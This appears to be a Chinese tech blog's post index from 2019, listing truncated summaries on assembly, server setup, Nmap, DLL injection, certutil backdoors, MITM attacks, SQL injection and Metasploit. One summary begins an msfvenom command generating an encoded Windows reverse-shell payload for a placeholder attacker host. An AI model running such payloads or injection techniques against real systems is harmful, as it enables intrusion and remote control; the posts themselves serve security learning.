lyshark

2019年7月5日

摘要：防火墙（Firewall）也称防护墙，是由Check Point创立者Gil Shwed于1993年发明并引入国际互联网（US5606668（A）1993-12-15）防火墙是位于内部网和外部网之间的屏障，它按照系统管理员预先定义好的规则来控制数据包的进出。防火墙是系统的第一道防线，其作用是防止非法用户的进入。阅读全文

posted @ 2019-07-05 10:21 lyshark 阅读(13897) 评论(0) 推荐(1)

Win32汇编：汇编版PE结构解析器

摘要： PE格式是Windows系统下最常用的可执行文件格式,有些应用必须建立在了解PE文件格式的基础之上,如可执行文件的加密与解密,文件型病毒的查杀等,熟练掌握PE文件结构,有助于软件的分析，本文章文字描述提取自`《琢石成器-Win32汇编语言程序设计》`一书中的重点内容。阅读全文

posted @ 2019-07-05 09:20 lyshark 阅读(1442) 评论(0) 推荐(0)

Win32汇编：字符串操作指令

摘要：移动串指令: MOVSB、MOVSW、MOVSD ;从 ESI -> EDI; 执行后, ESI 与 EDI 的地址移动相应的单位比较串指令: CMPSB、CMPSW、CMPSD ;比较 ESI、EDI; 执行后, ESI 与 EDI 的地址移动相应的单位扫描串指令: SCASB、SCASW、SCASD ;依据 AL/AX/EAX 中的数据扫描 EDI 指向的数据, 执行后 EDI 自动变化储存串指令: STOSB、STOSW、STOSD ;将 AL/AX/EAX 中的数据储存到 EDI 给出的地址, 执行后 EDI 自动变化载入串指令: LODSB、LODSW、LODSD ;将 ESI 指向的数据载入到 AL/AX/EAX, 执行后 ESI 自动变化其中的 B、W、D 分别指 Byte、Word、DWord, 表示每次操作的数据的大小单位. 阅读全文

posted @ 2019-07-05 09:18 lyshark 阅读(1534) 评论(0) 推荐(0)

Win32汇编：常用系统API函数

摘要：熟练掌握Win32 API函数的参数传递,是软件逆向的基础,本章节内容将使用MASM汇编器,逐个编译这些源程序,你可以通过使用一些调试工具,这里推荐OllyDBG来附加编译后的可执行文件,进行逐个分析,观察二进制程序逆向后的一些变化,总结吸收经验,为以后的二进制逆向,漏洞挖掘打基础. 阅读全文

posted @ 2019-07-05 09:18 lyshark 阅读(2113) 评论(0) 推荐(0)

Win32汇编：过程与宏调用

摘要：在计算机领域,堆栈是一个不容忽视的概念,堆栈是一种`后进先出(LIFO,Last-In,First-Out)`的数据结构,这是因为最后压入堆栈的值总是最先被取出,而新数值在执行PUSH压栈时总是被加到堆栈的最顶端,数据也总是从堆栈的最顶端被取出,堆栈是个`特殊的存储区`,主要功能是暂时存放数据和地址,通常用来保护断点和现场. 阅读全文

posted @ 2019-07-05 09:17 lyshark 阅读(2042) 评论(0) 推荐(0)

Win32汇编：算术与伪指令

摘要：每种汇编语言都有进行操作数移位的指令,移位和循环移位指令在控制硬件设备,加密数据,以及实现高速图形运算时特别有用,移位指令也是汇编语言中最具特征的指令集,`移位(Shifting)`的含义是在操作数内向左或向右移动数据位,Intel处理器提供了多种移位指令,具体如下表所示: 阅读全文

posted @ 2019-07-05 09:16 lyshark 阅读(1432) 评论(0) 推荐(0)

Win32汇编：汇编基本知识总结

摘要：汇编语言是所有程序设计语言中最古老的,它与计算机机器语言最为接近,通过汇编语言可以直接访问计算机的硬件,能够直接与CPU对话,可以说汇编语言是所有编程语言中语法格式最自由的,但自由的代价就是需要了解计算机体系结构和操作系统的大量细节,每编写一段程序都需要考虑各种硬件的状态,从而导致使用汇编写程序效率非常低. 阅读全文

posted @ 2019-07-05 09:15 lyshark 阅读(6527) 评论(0) 推荐(1)

Nmap 常用基础命令

摘要： Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端,确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统,正如大多数被用于网络安全的工具,Nmap也是不少黑客及骇客爱用的工具,系统管理员可以利用Nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用Nmap来搜集目标电脑的网络设定,从而计划攻击的方法. 阅读全文

posted @ 2019-07-05 09:12 lyshark 阅读(1549) 评论(0) 推荐(0)

Flask 框架基础知识笔记

摘要： Flask 基础 ◆CheckBox 复选框◆ HTML index.html <body> <form action="/" method="post"> <div class="MyDiv"> <label> <input type="checkbox" name="s_option" valu 阅读全文

posted @ 2019-07-05 09:10 lyshark 阅读(1176) 评论(0) 推荐(0)

2019年6月21日

C/C++ 实现远程代码注入

摘要： #include <windows.h> #include <iostream> #define STRLEN 20 typedef struct _DATA { DWORD dwLoadLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle 阅读全文

posted @ 2019-06-21 18:01 lyshark 阅读(1533) 评论(0) 推荐(0)

C/C++ 实现远程线程DLL注入

摘要：远程线程注入是最常用的一种注入技术，该技术利用的核心API是 `CreateRemoteThread()` 这个API可以运行远程线程，其次通过创建的线程调用 `LoadLibraryA()` 这个函数动态载入指定的DLL即可实现运行DLL，而`LoadLibrary()`函数在任何一个可执行文件中都可以被调用到，这就给我们注入提供了有效的条件. 阅读全文

posted @ 2019-06-21 17:59 lyshark 阅读(1426) 评论(0) 推荐(0)

2019年6月9日

certutil 命令配合PS反弹后门

摘要： Certutil.exe是一个命令行程序，作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原CA组件以及验证证书，密钥对和证书链。适用于：Windows Server 2012，Windows 10 1.使用Certutil 阅读全文

posted @ 2019-06-09 18:28 lyshark 阅读(1412) 评论(0) 推荐(0)

2019年5月28日

安全相技术关网站收藏

摘要：网站导航安全行业全景图纳威安全导航安全脉搏导航黑客榜中榜安全圈Info导航 SRCSEC导航 MottoIN导航安全工具库安全导航站长工具 ATOOL在线工具站长工具脚本之家在线工具爱站网 OpenGps deadlink(死链查询) DnsTree 端口扫描 whois 网站阅读全文

posted @ 2019-05-28 18:53 lyshark 阅读(1324) 评论(0) 推荐(0)

2019年5月27日

编译LNMP部署动态网站环境

摘要： LNMP动态网站部署架构是由一套 Linux+Nginx+MySQL+PHP 组成的动态网站系统解决方案.以下配置环境为：Linux=RHEL7 --> Nginx=1.13 --> MySQL=5.6 --> PHP=7.0 无错误版. 阅读全文

posted @ 2019-05-27 09:04 lyshark 阅读(548) 评论(0) 推荐(0)

编译LAMP部署动态网站环境

摘要： LAMP动态网站部署架构是由一套 Linux+Apache+MySQL+PHP 组成的动态网站系统解决方案.以下配置环境为：Linux=RHEL7 --> Apache=2.4.33 --> MySQL=5.5 --> PHP=7.0 无错误版. 阅读全文

posted @ 2019-05-27 09:03 lyshark 阅读(607) 评论(0) 推荐(0)

2019年5月12日

Amoeba 实现MySQL读写分离

摘要： Amoeba是一个以MySQL为底层数据存储,并对应用提供MySQL协议接口的proxy,它集中地响应应用的请求,依据用户事先设置的规则,将SQL请求发送到特定的数据库上执行.基于此可以实现负载均衡、读写分离、高可用性等需求,与MySQL官方的MySQL Proxy相比,作者强调的是amoeba配置的方便. 阅读全文

posted @ 2019-05-12 09:40 lyshark 阅读(559) 评论(0) 推荐(0)

2019年5月1日

CE修改器使用教程 [入门篇]

摘要： Cheat Engine 一般简称为CE，它是一款开放源代码的作弊软件，其主要功能包括、内存扫描、十六进制编辑器、动态调试功能于一体，且该工具自身附带了安全工具，可以用它很方便的生成自己的脚本，CE可以说是目前最优秀的游戏修改器不是之一，这款修改工具绝对值得你去学习，只需要花一点点时间就够了。阅读全文

posted @ 2019-05-01 15:25 lyshark 阅读(391707) 评论(7) 推荐(30)

2019年4月26日

C/C++ 内存读写Lib库简单封装

摘要：这是我在上学初中的时候封装的一个简单的偏移读写lib库，看起来很简单，当时很菜。阅读全文

posted @ 2019-04-26 17:13 lyshark 阅读(2617) 评论(0) 推荐(0)

2019年4月12日

KVM 虚拟机配置笔记

摘要：虚拟化是构建云计算基础架构不可或缺的关键技术之一,云计算的云端系统,其实质上就是一个大型的KVM分布式系统,虚拟化通过在一个物理平台上虚拟出更多的虚拟平台,而其中的每一个虚拟平台则可以作为独立的终端加入云端的分布式系统.比起直接使川物理平台,虚拟化在资源的有效利用,动态调配和高可靠性方而有着巨大的优势.利用虚拟化,企业不必抛弃现有的基础架构即可构建全新的信息基础架构,从而更加充分地利用原有的IT投资,可以说虚拟化是云计算不可缺少的重要组件. 阅读全文

posted @ 2019-04-12 15:15 lyshark 阅读(788) 评论(0) 推荐(0)

2019年4月1日

Ettercap 实施中间人攻击

摘要：中间人攻击(MITM)该攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网阅读全文

posted @ 2019-04-01 17:18 lyshark 阅读(2548) 评论(0) 推荐(1)

Nmap 常用基础命令详解

摘要： Nmap 是免费开放源代码实用程序，用于网络发现和安全审核。许多系统和网络管理员还发现它对于诸如网络清单，管理服务升级计划以及监视主机或服务正常运行时间之类的任务很有用。Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，包过滤器/防火墙的类型。正在使用中，还有许多其他特性。它旨在快速扫描大型网络，但可以在单个主机上正常运行。阅读全文

posted @ 2019-04-01 17:08 lyshark 阅读(48113) 评论(0) 推荐(7)

2019年3月31日

SQL 注入漏洞检测与利用

摘要： SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句. 阅读全文

posted @ 2019-03-31 17:39 lyshark 阅读(8643) 评论(0) 推荐(2)

2019年3月20日

Metasploit 服务扫描与爆破

摘要： MSF 服务发现常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等. MSF模块搜索: [root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http t 阅读全文

posted @ 2019-03-20 16:47 lyshark 阅读(1464) 评论(0) 推荐(1)

使用MSF生成各种Payload

摘要： Windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 - 阅读全文

posted @ 2019-03-20 12:07 lyshark 阅读(1725) 评论(0) 推荐(0)

2019年1月6日

Varnish 实现Web站点加速

摘要： Varnish 是一款高性能的开源HTTP加速器。阅读全文

posted @ 2019-01-06 18:02 lyshark 阅读(720) 评论(0) 推荐(1)

YUM安装LAMP与LNMP

摘要： LAMP动态网站部署架构是由一套 Linux+Apache+MySQL+PHP 组成的动态网站系统解决方案.LNMP动态网站部署架构是由一套 Linux+Nginx+MySQL+PHP 组成的动态网站系统解决方案.编译安装费时费力有时还会出错误,下面我们将通过Yum仓库,快速构建LANMP网站环境. 阅读全文

posted @ 2019-01-06 18:01 lyshark 阅读(565) 评论(0) 推荐(1)

快速部署Apache服务静态网站

摘要： Apache是世界使用排名第一的Web服务器软件.它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一.它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中.同时Apache音译为阿帕奇,是北美印第安人的一个部落,叫阿帕奇族,在美国的西南部.也是一个基金会的名称、一种武装直升机等等. 阅读全文

posted @ 2019-01-06 18:00 lyshark 阅读(772) 评论(0) 推荐(0)

HaProxy 负载均衡集群

摘要： HAProxy是一个使用C语言编写的自由及开放源代码软件，其提供高可用性、负载均衡，以及基于TCP和HTTP的应用程序代理,特别适用于那些负载特大的web站点，这些站点通常又需要会话保持或七层处理。HAProxy运行在当前的硬件上，完全可以支持数以万计的并发连接。并且它的运行模式使得它可以很简单安全的整合进您当前的架构中，同时可以保护你的web服务器不被暴露到网络上。阅读全文

posted @ 2019-01-06 17:59 lyshark 阅读(769) 评论(0) 推荐(0)

部署GitLab代码托管仓库

摘要： GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,GitLab是使用Ryby开发的一个开源的版本管理系统,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目.它拥有与Github类似的功能,能够浏览源代码,管理缺陷和注释.可以管理团队对仓库的访问,它非常易于浏览提交过的版本并提供一个文件历史库.团队成员可以利用内置的简单聊天程序(Wall)进行交流.它还提供一个代码片段收集功能可以轻松实现代码复用,便于日后有需要的时候进行查找,本博文内容将介绍Git,GitLab,的区别以及SVN与GitLab的差异,然后就是通过Yum包快速的搭建一个GitLab环境. 阅读全文

posted @ 2019-01-06 17:59 lyshark 阅读(1150) 评论(0) 推荐(0)

2019年1月4日

Linux 系统防火墙配置与管理

摘要： Linux 系统下管理防火墙规则的管理程序有两种，分别是iptables防火墙与firewall防火墙，虽然现在新版系统中早已不在使用Iptables，新版本系统中默认安装firewall管理程序，相比于Iptables更具有灵活性。阅读全文

posted @ 2019-01-04 18:34 lyshark 阅读(2273) 评论(0) 推荐(0)

公告